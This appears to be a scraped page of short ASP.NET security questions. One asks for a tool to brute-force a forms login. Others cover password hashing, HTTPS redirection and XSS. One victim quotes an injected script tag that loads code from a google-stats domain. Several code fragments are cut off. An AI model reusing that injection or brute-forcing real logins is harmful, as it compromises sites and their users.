Security - Good Software To Dictionary Or Brute Force Attack IIS?
Jun 8, 2010
I am looking for something that takes an IIS/ASP.NET website that uses forms authentication and repeatedly tries to log in, either with all possible passwords or with passwords from a dictionary.
I can probably write something up, but I wondered if there was anything publicly available that would be better implemented.
I have a class that maintains a static dictionary of cached lookup results from my domain controller - users' given names and e-mails.My code looks something like:
private static Dictionary<string, string> emailCache = new Dictionary<string, string>(); protected string GetUserEmail(string accountName) { if (emailCache.ContainsKey(accountName)) { return(emailCache[accountName]); } lock(/* something */) { if (emailCache.ContainsKey(accountName)) [code]...
I'm just wondering if the built in Hashing in the ASP.Net membership good password security, or if there is more that I should do to protect my passwords? If so, what should I look into for a higher level of security?
I have created a test user/password on my web site. The intent is to have prospective clients login and try out the tool. Instead of telling them the userid/password of the test user, I'd like to tweak the Login wizard.
In the Load event, I was able to specify login1.UserName = "test user"
But when I try to specify the password, I'm told it is a readonly field. How can I 'force' a specific password? Or, how can I call the login event directly and pass the needed values?
Does ASP.NET have the capacity to force a user to a login page if they open a new tab or window to the site? So I've got a window open to A Site, I open a new tab to A Site, or a new window to A Site, is it possible to automagically detect that and force a fresh login?
I have a client who is trying to press this requirement on me, and insists that they do it in-house using Session.IsNew. That of course only works when the session has timed out. Is it possible to force a fresh login within an existing session when a new window or tab opens, or no?
Okay, so I have a site which I'd like to use my SSL certificate for always. So I want all users to be forced to the https version of any url they are directed to.I used this code in my global.asax file:
[Code]....
I've also tried it in the 'Application_BeginRequest' function also. Basically, I have two directories that are secured via Windows Authentication against my domain. if you browsed to the directory (ex. http://www.domain.com/secure) it tries first to authenticate then redirect to https://www.domain.com/secure. In this case it will ask for credentials twice one right after the other. Is their a way I can have the user redirected before Windows Authentication kicks in?
How can I force page to use secure connection "https". Client might call the page using insecure connection. I want the page to to check connection, if insecure connection "http" is being used, reload the page with secure "https" connection
My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.
Using C# and sqlmembershipprovider forms authentication, is there a way to force user password to expire and need to be reset after x number of days?
So if a user launches the website login.aspx page, when they type their userid, it will check if the password is expired and direct them to a Resetpassword.aspx page?
I'm using a literal to display some javascript on a product page control. Basically what I'm doing is in my code behind I'm declaring a new stringbuilder, writing the script while inserting some dynamic variables to populate the script then setting the literal text to the stringbuilder. This leaves me open to xss attacks. What can I do to prevent this?
System.Text.StringBuilder sb = new System.Text.StringBuilder(); //loop through items in the collection for (int i = 0; i < _prod.ActiveProductItemCollection.Count; i++) { sb.Append("<script type='text/javascript'>"); //add +1 to each item sb.AppendFormat("mboxCreate("product_productpage_rec{0}",", i+1); [code]...
I have a textBox and a property to get and set its value:
public SomeText { get { return HttpUtility.HtmlEncode(textBox.Text); } set { textBox.Text = HttpUtility.HtmlEncode(value); } }
I have used HtmlEncode to prevent Javascript injection attacks. After thinking about it though I'm thinking I only need the HtmlEncode on the getter. The setter is only used by the system and can not be accessed by an external user.
I am trying to force to show to the Logon popup when the session is timeout in Integrated Windows Authentication Enabled website. The session_timeout is firing during the session timeout, but the User.Identity.IsAuthenticated is true. How force to use the Windows Logon Screen when the session is timeout.
How do you sort a dictionary object in C# 2.0 for asp.net or is their an alternative to Dictionay for sorting this is to sort a countries list alphabetically
I end up with a row for each object in the list, and any cell in a given row is bound to a property of the corresponding object.
However, suppose one of the properties of my object is a dictionary, and each is expected to contain a specific key. Is there any way to bind one of my DataGridColumns to that dictionary key?